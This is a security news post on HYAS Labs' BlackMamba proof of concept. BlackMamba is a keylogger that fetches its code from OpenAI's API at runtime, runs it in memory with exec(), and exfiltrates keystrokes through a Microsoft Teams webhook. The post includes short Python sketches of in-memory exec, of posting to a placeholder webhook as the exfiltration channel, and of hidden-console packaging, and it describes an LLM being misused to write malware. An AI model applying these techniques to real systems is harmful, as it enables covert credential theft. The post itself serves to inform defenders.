To illustrate what AI-based malware is capable of, the team at HYAS Labs has released a proof of concept (PoC) that exploits a large language model to synthesize polymorphic keylogger functionality on the fly, dynamically modifying benign code at runtime — all without any command-and-control infrastructure to deliver or verify the malicious keylogger functionality. The PoC and results are published in the HYAS blog post “BlackMamba: Using AI to Generate Polymorphic Malware” and the whitepaper “HYAS Labs Threat Intelligence: BlackMamba AI-Synthesized, Polymorphic Keylogger with On-the-Fly Program Modification.”
To create the PoC, HYAS researchers united two seemingly disparate concepts:
a) eliminating the command-and-control (C2) channel by equipping the malware with intelligent automation so that it can push any attacker-bound data back out through a benign communication channel, and
b) leveraging AI code-generation techniques to synthesize new malware variants, changing the code so that it evades detection algorithms.
BlackMamba utilizes a benign executable that reaches out to a high-reputation API (OpenAI) at runtime to retrieve the synthesized, malicious code needed to steal an infected user’s keystrokes. It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining entirely in memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested many times against an industry-leading EDR, which will remain nameless, resulting in zero alerts or detections.
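The in-memory execution pattern described above can be sketched with a harmless stand-in: the string below plays the role of text returned by the LLM API, and exec() runs it inside the host process without anything touching disk. The function name and behavior are illustrative assumptions, not the actual BlackMamba payload.

```python
# Benign sketch of runtime code synthesis + in-memory execution.
# In the PoC, `synthesized_source` would come back from an LLM API call;
# here it is a hard-coded stand-in that merely echoes its input.
synthesized_source = """
def collect(event):
    # In BlackMamba this body would be keylogging logic; here it just echoes.
    return f"captured: {event}"
"""

namespace = {}
# compile + exec keeps the generated code entirely in memory.
exec(compile(synthesized_source, "<generated>", "exec"), namespace)

result = namespace["collect"]("hello")
print(result)  # captured: hello
```

Because the source string can differ on every run, signature-based detection has no stable artifact to match — which is the core of the “polymorphic” claim.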
Once a device is infected, BlackMamba exfiltrates data through Microsoft Teams. Using its built-in keylogging ability, BlackMamba can collect sensitive information such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into the device. Once this data is captured, the malware uses a Microsoft Teams webhook to send it to a malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.
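The exfiltration step relies on Teams’ standard incoming-webhook feature, which accepts a JSON body with a "text" field POSTed to a per-channel URL. A minimal sketch of that mechanism, assuming a hypothetical webhook URL and helper names of my own choosing (not from the PoC):

```python
import json
import urllib.request

# Hypothetical per-channel URL; a real one is generated when an
# incoming webhook is added to a Teams channel.
WEBHOOK_URL = "https://example.webhook.office.com/webhookb2/..."

def build_payload(message: str) -> bytes:
    """Encode a simple text message as the JSON body Teams expects."""
    return json.dumps({"text": message}).encode("utf-8")

def post_to_teams(message: str) -> None:
    """POST the message to the channel's incoming webhook."""
    req = urllib.request.Request(
        WEBHOOK_URL,
        data=build_payload(message),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)  # requires a real webhook URL

if __name__ == "__main__":
    print(build_payload("hello channel"))
```

Because the traffic is ordinary HTTPS to Microsoft infrastructure, it blends in with legitimate Teams activity — the “high-reputation channel” point the researchers make.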
Delivery uses auto-py-to-exe, an open-source Python package that lets developers convert Python scripts into standalone executables that run on Windows, macOS, and Linux. As the HYAS blog notes: “The threats posed by this new breed of malware are very real. By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions.”
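auto-py-to-exe is a GUI front end over PyInstaller, so the packaging step amounts to choosing PyInstaller flags. A minimal sketch of that mapping, with a hypothetical script name and a helper of my own naming; the actual build call is left commented out since it requires PyInstaller to be installed:

```python
# Sketch of the PyInstaller options auto-py-to-exe configures for a
# standalone build. "payload.py" is a hypothetical script name.
def pyinstaller_args(script: str, onefile: bool = True, windowed: bool = True):
    """Build the argument list auto-py-to-exe would hand to PyInstaller."""
    args = [script]
    if onefile:
        args.append("--onefile")    # bundle everything into one executable
    if windowed:
        args.append("--noconsole")  # suppress the console window on launch
    return args

print(pyinstaller_args("payload.py"))
# To actually build (requires PyInstaller):
#   import PyInstaller.__main__
#   PyInstaller.__main__.run(pyinstaller_args("payload.py"))
```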
The HYAS BlackMamba Blog and the full whitepaper are linked here.
UPDATE: I have two comments on this. The first is from Matt Mullins, Senior Security Researcher at Cybrary:
“The BlackMamba sample is very interesting due to its integration of ChatGPT to “prompt hack” as part of its initial payload. The malware sends a prompt to ChatGPT, then uses the returned information as part of the Python code (via the exec function) to create the code, which is then injected and subsequently communicates back via a Teams webhook. This is a very simple yet very advanced piece of malware because it flies under most detection radars by simply using the same applications that users would (either out of curiosity or by job necessity).
“The article says that it doesn’t have a C2, but technically it is using Teams for the communication, so (in my opinion) a better framing is the use of high-reputation servers for the “C2” comms (Teams and the Microsoft infrastructure). This strategy isn’t entirely new, as it has been used before with things like CDNs to bypass filters. Teams has been adopted by a large number of organizations, and it also has a couple of issues beyond this that should warrant a serious conversation about its viability as a secure communications channel.
“The BlackMamba malware is thoughtfully crafted, simple, and elegant. Thus it passes the sniff test of “KISS” or keep-it-simple-stupid when it comes to engineering. The creative use of ChatGPT for the injection code, along with the use of Teams, creates a really great 1-2 punch for bypassing most EDR and detections (human and machine-based), as it allows the malware to “swim with the people.” This is typically the gold standard for good OpSec.”
Morten Gammelgaard, EMEA co-founder of BullWall, follows up with this:
“Truly unnerving. AI-controlled polymorphic malware without the need for command and control. This is a slam dunk: preventative measures will never be able to keep up and therefore will continue to become less and less effective.
“This particular approach is one example of how the malware never looks the same (the AI regenerates it on each attack), so defenders cannot establish a model to defend against, as they now do with known attack methods. The “keystroke” example here takes a common approach to how credentials are stolen and then used for access, and shows how that approach can be made much more effective, i.e., able to bypass defenses. Not to mention that this approach did not even require a dedicated C2 server that could be tracked.
“Also, Polymorphic viruses historically rely on mutation engines to alter their decryption routines. If publicly available AI engines enable script kiddies to create these viruses, that’s a real problem.
“When stealing system-specific credentials becomes easy, then access and lateral movement are easy, and bam! they have your data. At that point, how they harm you is almost moot. Data theft and ransomware are popular abuses when that happens. So yeah, easier access is a very big deal.”